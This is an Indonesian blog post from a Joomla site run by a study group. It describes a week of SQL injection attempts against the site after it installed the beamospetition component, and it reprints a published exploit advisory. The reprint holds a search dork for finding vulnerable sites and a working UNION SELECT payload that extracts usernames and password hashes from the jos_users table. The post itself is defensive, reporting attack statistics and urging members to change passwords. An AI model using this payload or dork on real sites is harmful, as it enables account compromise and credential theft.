gabung.gif

Kamar Kecil

web design company
chess
Poker Tables
FURNITURE

Home arrow Bagi Cerita arrow Artikel arrow Website CMS arrow Bentang Alam Kebanjiran "Remote SQL Injection"
Bentang Alam Kebanjiran "Remote SQL Injection"

By Bentang Alam,

Views : 499    

Published in : Artikel, Website CMS

Cuma gara-gara install Joomla Component beamospetition, seminggu terakhir website Bentang Alam Kebanjiran "Remote SQL Injection". Lihat saja dicatatan statistik negara pengujung, melonjak drastis mulai dari Turkey, Maroko sampai negeri Jepun sempat mencoba Remote SQL Injection. Apa sih sebenarnya Remote SQL Injection itu? dan apa dampaknya? wah ini menarik untuk jadi bahan belajar. dari hasil penelusuran sementara dan merujuk artikel Joomla Component beamospetition Remote SQL Injection Vulnerability keluaran securityreason.com. Aksi injeksi SQL dapat dilakukan pada website CMS Joomla yang menggunakan component beamospetition. Dan Bentang Alam website menggunakan component ini.

Berikut script dan informasi tentang Joomla Component beamospetition Remote SQL Injection Vulnerability :

 

Exploit Code : 

/---------------------------------------------------------------\
\ /
/ Joomla Component beamospetition Remote SQL injection \
\ /
\---------------------------------------------------------------/


[*] Author : His0k4 [ALGERIAN HaCkEr]

[*] Dork : inurl:com_beamospetition

[*] POC :
http://localhost/[Joomla_Path]/index.php?option=com_beamospetition&pet={
SQL}

[*] Example :
http://localhost/[Joomla_Path]/index.php?option=com_beamospetition&pet=-
5 UNION SELECT
user(),user(),user(),user(),user(),user(),user(),concat(username,0x3a,pa
ssword),user(),user(),user(),user(),user(),user(),user() FROM
jos_users--

------------------------------------------------------------------------
----
[*] Greetings : All friends & muslims HaCkeRs...
[*] Greetings2: http://www.dz-secure.com
http://palcastle.org/cc

Image
Report CrawlTrack 06
Data statistik 1 minggu terakhir website Bentang Alam berikut dapat dilihat terdapat 222 upaya code injection dan 63 upaya SQL Injection. Sejauh ini belum ada upaya-upaya itu yang dapat menembus sistem keamanan website Bentang Alam. Dampak belum diketahui pasti, namun sangat disarankan kepada semua member website Bentang Alam untukmelakukan pengantian password secara berkala. Update berikut akan di muat daftar detail statisik upaya SQL Injection Component Beamospetition di Website Bentang Alam.

 

Image
Report CrwalTrack 06

Only registered users can write comments!
+/- Comments
Search

3.21 Copyright (C) 2007 Alain Georgette / Copyright (C) 2006 Frantisek Hliva. All rights reserved."


    
Quote this article in website
Save this to del.icio.us

Users' Comments  RSS feed comment
 

Average user rating

   (0 vote)

  


Add your comment

No comment posted



mXcomment 1.0.2 © 2007-2008 - visualclinic.fr
License Creative Commons - Some rights reserved
Senin, 30 Juni 2008
Terakhir Diperbaharui ( Senin, 30 Juni 2008 )
 
< Sebelumnya   Berikutnya >
[ Kembali ]

Advertisement

Koperasi Klik

Umpan RSS

Click Disini untuk berlangganan RSS Bentang Alam

100 pembaca sudah bergabung di berbagi cerita, bagaimana dengan Anda?

Daftarkan Email Disini


Lihat Tampilan Email Jangan Lupa untuk periksa email anda dan lakukan konfirmasi pendaftaran.

Syndicate

Visitor Scroll

 





Website ini adalah hasil kerja sukarela Tim Belajar Bentang Alam, dengan semangat berbagi pengetahuan dan tukar menukar informasi melalui media internet. Bentang Alam adalah kelompok belajar yang fokus pada pengelolaan data informasi berbasis web dan Geografic Information Syetem (GIS). Kelompok ini bersifat terbuka, mandiri dan independen. Anggota atau para pelajar di Kelompok ini terdiri dari individu yang memiliki visi untuk berbagai pengetahuan dan informasi.
WordLinx - Get Paid To Click  Free Web Hosting with Website Builder  CO.CC:Free Domain
  bunnet   rastafaraus   Hosting